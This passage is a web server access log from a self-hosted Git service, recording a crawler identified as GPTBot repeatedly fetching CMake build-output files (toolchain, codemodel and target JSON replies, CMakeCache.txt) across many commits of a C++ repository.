"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12861] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9993] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:14:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13532] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13535] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12781] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13608] [Gzip 4.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:14:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13533] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9988] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13917] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13535] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12618] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:14:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9985] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12459] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 12619] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 9991] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:14:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13534] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" [Client 74.7.227.38] [Length 9999] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" +[17/Feb/2026:18:14:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13732] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:14:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" [Client 74.7.227.38] [Length 1045] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" +[17/Feb/2026:18:14:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 13532] [Gzip 8.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12777] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:14:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" [Client 74.7.227.38] [Length 1173] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:18:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 964] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:14:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 10996] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:14:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 13915] [Gzip 8.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" [Client 74.7.227.38] [Length 1694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:18:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13363] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:14:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 12463] [Gzip 6.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" [Client 74.7.227.38] [Length 9987] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:18:14:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr 